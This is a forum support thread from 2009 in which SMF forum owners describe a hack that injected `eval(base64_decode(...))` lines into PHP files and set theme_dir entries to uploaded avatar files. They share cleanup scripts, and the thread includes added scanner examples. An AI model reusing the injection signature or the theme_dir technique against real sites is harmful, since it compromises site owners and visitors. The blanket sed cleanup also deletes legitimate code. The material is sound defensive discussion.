Author Topic: Hacked, script injection  (Read 248173 times)

Offline romper

  • Semi-Newbie
  • *
  • Posts: 88
Re: Hacked, script injection
« Reply #320 on: May 22, 2009, 09:26:17 AM »
Just to mention, I realized now that yesterday, after I deleted kris and removed all avatars and upgraded to 1.1.9, it worked, but today it doesn't, and nothing I upload shows on my server in the attachment dir. So obviously I didn't clean everything. Please help.

Offline ConquerorOfMankind

  • Semi-Newbie
  • *
  • Posts: 11
Re: Hacked, script injection
« Reply #321 on: May 22, 2009, 10:31:51 AM »
Quote
and nothing I upload shows on my server in attachment dir.

Did you set chmod rights correctly?

Offline romper

  • Semi-Newbie
  • *
  • Posts: 88
Re: Hacked, script injection
« Reply #322 on: May 22, 2009, 12:36:33 PM »
Quote
and nothing I upload shows on my server in attachment dir.

Did you set chmod rights correctly?

Yes....It worked yesterday.

Offline romper

  • Semi-Newbie
  • *
  • Posts: 88
Re: Hacked, script injection
« Reply #323 on: May 22, 2009, 01:13:45 PM »
I just wanted to delete SMF Gallery and the uninstall failed in:
4.    Execute Modification    ./Sources/ManagePermissions.php    Test failed
5.    Execute Modification    ./Themes/default/index.template.php    Test failed

So I checked those 2 files, and saw this:
<?php /**/eval(base64_decode('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')); ?>

But even when I delete that I can't uninstall the gallery without "test failed".

Offline Kindred

  • The Mean One
  • Support Specialist
  • SMF Legend
  • *
  • Posts: 55,122
  • Gender: Male
    • Kindred-999 on GitHub
Re: Hacked, script injection
« Reply #324 on: May 22, 2009, 01:28:17 PM »
the failure of a mod to install has no bearing on the hack... the "test failed" suggests that something has changed the code that the mod is looking for so that it cannot automatically install. You will have to manually install the mod into those files.

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

Offline romper

  • Semi-Newbie
  • *
  • Posts: 88
Re: Hacked, script injection
« Reply #325 on: May 22, 2009, 01:41:38 PM »
Quote
the failure of a mod to install has no bearing on the hack... the "test failed" suggests that something has changed the code that the mod is looking for so that it cannot automatically install. You will have to manually install the mod into those files.

I'm trying to uninstall.... Problem is I see code (already mentioned here... eval base64... and so on) in more files, and I have a lot of mods installed. I was hoping that 1.1.9 would fix that, but now I'm not sure what to do?
Start deleting those lines manually? Leave everything? Restore base? Delete everything and start over? (hope not)

Offline Kindred

  • The Mean One
  • Support Specialist
  • SMF Legend
  • *
  • Posts: 55,122
  • Gender: Male
    • Kindred-999 on GitHub
Re: Hacked, script injection
« Reply #326 on: May 22, 2009, 02:12:02 PM »
If you have a backup from before the attack, then use that... (if you don't, then I suggest that you start keeping one)

Otherwise, take the full install package of SMF 1.1.9, save the Settings.php file on your local computer and delete all PHP files from your forum directories. Then reload the forum files using the install package... delete the install files and copy your saved version of Settings.php (after making sure that it is clean).

You now have your forum reset to a clean state and you can re-apply mods as needed.
Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

Offline ellion

  • Jr. Member
  • **
  • Posts: 203
Re: Hacked, script injection
« Reply #327 on: May 22, 2009, 05:03:43 PM »
i just went through my DB to check for theme_dir entries and i found the following entries.
Code: [Select]
249  32  theme_dir  ./attachments/avatar_249.gif\0
280  32  theme_dir  ./attachments/avatar_280.jpg\0
488  32  theme_dir  ./attachments/avatar_488.jpg\0
the first column of numbers are the member id; the id 488 is kris barteo.

should i delete these entries?
« Last Edit: May 22, 2009, 05:20:27 PM by ellion »
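One way to pull rows like ellion's out of an smf_themes export automatically, as an added example that is not part of ellion's post or of SMF itself. It assumes a tab-separated batch export of the SMF 1.1 smf_themes table (columns ID_MEMBER, ID_THEME, variable, value, as in ellion's listing) and flags every theme_dir value that does not sit under a Themes/ directory, which is where a legitimate value points. The sample export below is constructed to mirror the rows quoted above.

```shell
#!/bin/bash
# Added example, not from ellion's post or from SMF: flag smf_themes rows whose
# theme_dir value points outside the Themes directory, as the avatar paths above do.
# Assumes a tab-separated batch export, e.g. (column and table names are SMF 1.1's;
# the export command itself is an assumption):
#   mysql -B -e "SELECT ID_MEMBER, ID_THEME, variable, value FROM smf_themes WHERE variable='theme_dir'"
set -u

# Print "ID_MEMBER<TAB>ID_THEME<TAB>value" for every theme_dir row whose value does
# not live under a Themes/ directory. A legitimate value looks like
# /path/to/forum/Themes/default; anything under ./attachments/ is suspect.
flag_bad_theme_dirs() {
    awk -F'\t' '$3 == "theme_dir" && $4 !~ /(^|\/)Themes\// { print $1 "\t" $2 "\t" $4 }' "$1"
}

# Constructed sample export: one legitimate row and three rows shaped like
# ellion's findings (the trailing \0 is the null byte shown in the listing).
make_sample_export() {
    local f
    f=$(mktemp)
    printf '%s\t%s\t%s\t%s\n' \
        0   1  theme_dir '/home/example/public_html/Themes/default' \
        249 32 theme_dir './attachments/avatar_249.gif\0' \
        280 32 theme_dir './attachments/avatar_280.jpg\0' \
        488 32 theme_dir './attachments/avatar_488.jpg\0' > "$f"
    printf '%s' "$f"
}

SAMPLE_EXPORT=$(make_sample_export)
flag_bad_theme_dirs "$SAMPLE_EXPORT"
```

Every flagged member id should be looked up in the members table before anything is deleted, which is the question Sarge asks in the next reply: the row for the attacker's account is expected, rows for other members show which accounts the attacker used.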

Offline Sarge

  • SMF Friend
  • SMF Hero
  • *
  • Posts: 6,209
  • Gender: Male
    • Zëri YT!
Re: Hacked, script injection
« Reply #328 on: May 22, 2009, 05:14:48 PM »
What are the names for the other IDs?
    Please do not PM me with support requests unless I invite you to.

http://www.zeriyt.com/   ~   http://www.galeriashqiptare.net/


Quote
<H> I had zero posts when I started posting

Offline WHK

  • Semi-Newbie
  • *
  • Posts: 32
Re: Hacked, script injection
« Reply #329 on: May 22, 2009, 07:21:44 PM »

Offline JBlaze

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 12,152
    • @fragicide on Twitter
Re: Hacked, script injection
« Reply #330 on: May 22, 2009, 07:32:15 PM »

Offline Kindred

  • The Mean One
  • Support Specialist
  • SMF Legend
  • *
  • Posts: 55,122
  • Gender: Male
    • Kindred-999 on GitHub
Re: Hacked, script injection
« Reply #331 on: May 22, 2009, 07:47:50 PM »
ok... rather than post a link to a Spanish forum with a relatively useless comment, care to tell us what they claim the bug in 1.1.9 is?
Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

Offline FinsandFur

  • Jr. Member
  • **
  • Posts: 184
Re: Hacked, script injection
« Reply #332 on: May 24, 2009, 02:53:58 AM »
I've got another forum that he hit.
I scanned through most of what you folks got here, but couldn't bring myself to read all 17 pages :-\

Basically, I'm just bringing ya's some more info to the table.

The said forum was for a client I just took over the maintenance duties last week.
They were on 1.1.7 at the time of the hack, which was Jan 18th, 09.
The path he chose was relatively easy to follow looking at last modified dates through SSH.

He also added a php file to the Packages directory titled "tvax.php" that was heavily infected. I DO have that file zipped if anyone wants to analyze it.


Offline Daniel15

  • SMF Friend
  • SMF Hero
  • *
  • Posts: 4,221
  • Gender: Male
  • http://dan.cx/
    • daaniel on Facebook
    • Daniel15 on GitHub
    • daniel15 on LinkedIn
    • @Daniel15 on Twitter
    • Daniel15
Re: Hacked, script injection
« Reply #333 on: May 24, 2009, 05:28:40 AM »
I'm a victim too, and took another route in preventing future attacks. First, I didn't have backups so I downloaded and cleaned the files using this Linux bash script with base64_encode as the search term. The script deletes that line entirely, leaving no white space:
Code: [Select]
#!/bin/bash
# Recursively delete every line containing base64_decode from the PHP files under the directory
find /directory_name -name '*.php' -type f | while read -r FILE
do
    sed -i '/base64_decode/ d' "$FILE"
done
This cleaned everything recursively, but I did have to replace one file that had a legit line with the search term in it (can't remember which one, but you'll know from the error it generates). Then I uploaded the clean files and was back in business. Took about an hour to do all this.

Thanks for the script, saved me a whole heap of time cleaning an infected forum. :)
Now to clean the random junk it left behind >_<
Daniel15, former Customisation team member, resigned due to lack of time. I still love everyone here :D.
Go to smfshop.com for SMFshop support, do NOT email or PM me!
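A more selective version of the cleanup Daniel15 and Ratiomaster describe, added here as an example; it is not Daniel15's script, Ratiomaster's attachment or SMF code. Deleting every line that mentions base64_decode also removes legitimate calls (the "one file that had a legit line" Daniel15 had to restore), so this one first lists the files containing the exact one-liner quoted earlier in the thread, `<?php /**/eval(base64_decode('...')); ?>`, and then deletes only lines of that shape, keeping a .bak copy of each file it touches. The sample tree it builds is constructed: two infected files plus one file with a legitimate base64_decode() call.

```shell
#!/bin/bash
# Added example, not Daniel15's script and not SMF code: report, then remove, the
# injected one-liner quoted in this thread while leaving other base64_decode() calls
# alone. Run scan_injected and read the list before running clean_injected.
set -u

# ERE for the injected line. The base64 payload is matched by character class rather
# than copied from the thread; the two quote characters are matched with '.'.
INJECT_RE='<\?php[[:space:]]*/\*\*/eval\(base64_decode\(.[A-Za-z0-9+/=]*.\)\);[[:space:]]*\?>'

# Print the PHP files under $1 that contain the injected line (read-only).
scan_injected() {
    # grep -l exits 1 when nothing matches; for us that is a clean tree, not an error.
    find "$1" -type f -name '*.php' -exec grep -lE "$INJECT_RE" {} + || true
}

# Number of infected PHP files under $1.
count_injected() {
    scan_injected "$1" | wc -l | tr -d ' '
}

# Delete only lines matching INJECT_RE in the files scan_injected reports,
# keeping a .bak copy of each touched file. '#' is used as the sed delimiter
# because the pattern itself contains '/'.
clean_injected() {
    scan_injected "$1" | while IFS= read -r f; do
        sed -i.bak -E "\#$INJECT_RE#d" "$f"
    done
}

# Constructed sample tree: two infected files and one file with a legitimate
# base64_decode() call, which a blanket '/base64_decode/ d' would also remove.
make_sample_tree() {
    local dir
    dir=$(mktemp -d)
    mkdir -p "$dir/Sources" "$dir/Themes/default"
    printf '%s\n' "<?php /**/eval(base64_decode('aGVsbG8='));?>" '<?php' 'echo "index";' > "$dir/index.php"
    printf '%s\n' '<?php' '$data = base64_decode($encoded); // legitimate use' > "$dir/Sources/Subs.php"
    printf '%s\n' "<?php /**/eval(base64_decode('d29ybGQ=')); ?>" '<?php function template_main() {}' > "$dir/Themes/default/index.template.php"
    printf '%s' "$dir"
}

SAMPLE_DIR=$(make_sample_tree)
echo "infected files before cleaning: $(count_injected "$SAMPLE_DIR")"
scan_injected "$SAMPLE_DIR"
clean_injected "$SAMPLE_DIR"
echo "infected files after cleaning:  $(count_injected "$SAMPLE_DIR")"
```

Point it at a copy of the forum rather than the live tree, diff the .bak files against the cleaned ones before uploading, and treat a clean scan as only one part of the job: it says nothing about the database rows and extra files (tvax.php, the avatar entries) that other posts in this thread describe.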

Offline agridoc

  • SMF Hero
  • ******
  • Posts: 3,274
  • Gender: Male
    • Aeromodelling GR - Aeromodelling in Greece
Re: Hacked, script injection
« Reply #334 on: May 24, 2009, 05:52:36 AM »
Although I did some work with SSH commands, I finally cleaned my files by creating a zip file with SSH, containing all PHP files in my domain
Code: [Select]
zip -R filename '*.php'
Then cleaned them with Search & Replace Master, an excellent freeware tool, I really liked it, then FTP'd them to my site.

It's useful to have a file with the injected code. See here how to use it for finding the directory with style.css.php and s.php
http://www.simplemachines.org/community/index.php?topic=307717.msg2060807#msg2060807
  For Greek aeromodellers and our friends around the world  - Greek Button sets for SMF - Greeklish to Greek mod
I don't spend time on messages in Greeklish.

Offline Ratiomaster

  • Newbie
  • *
  • Posts: 7
Re: Hacked, script injection
« Reply #335 on: May 24, 2009, 02:09:52 PM »
I've made a PHP script that will clean all infected files on your server (attached).
Just put it in the root directory and it will search and remove the junk line from all PHP files recursively.

Btw, are there other problems caused by this hack? Like does it install some backdoors that need to be removed as well?

Offline Dzonny

  • Lead Localizer
  • SMF Super Hero
  • *
  • Posts: 11,617
  • Gender: Male
  • No sleep...
    • dzontra.nikola on Facebook
    • Dzonny on GitHub
    • dzontranikola on LinkedIn
    • @opusteniforum on Twitter
    • Samo opusteno
Re: Hacked, script injection
« Reply #336 on: May 25, 2009, 02:57:02 PM »
Really, that is very good work Ratiomaster...
Anyone fixed forum with this tool ??

Offline romper

  • Semi-Newbie
  • *
  • Posts: 88
Re: Hacked, script injection
« Reply #337 on: May 25, 2009, 04:48:29 PM »
Quote
I've made a PHP script that will clean all infected files on your server (attached).
Just put it in the root directory and it will search and remove the junk line from all PHP files recursively.

Btw, are there other problems caused by this hack? Like does it install some backdoors that need to be removed as well?

Greattt! I'm clean now, but this will be in my reserves!!!

Offline aly22

  • Semi-Newbie
  • *
  • Posts: 39
Re: Hacked, script injection
« Reply #338 on: May 25, 2009, 06:50:28 PM »
if I already deleted user kristabero how do I know if the avatar has been left behind please?

Offline aly22

  • Semi-Newbie
  • *
  • Posts: 39
Re: Hacked, script injection
« Reply #339 on: May 25, 2009, 10:44:34 PM »
Anyone tried the cleanup script? I don't want to be skeptical, and it scans clean ... but with all I've cleaned up manually over the past week, I am timid of installing/running anything without some assurance it works. Thx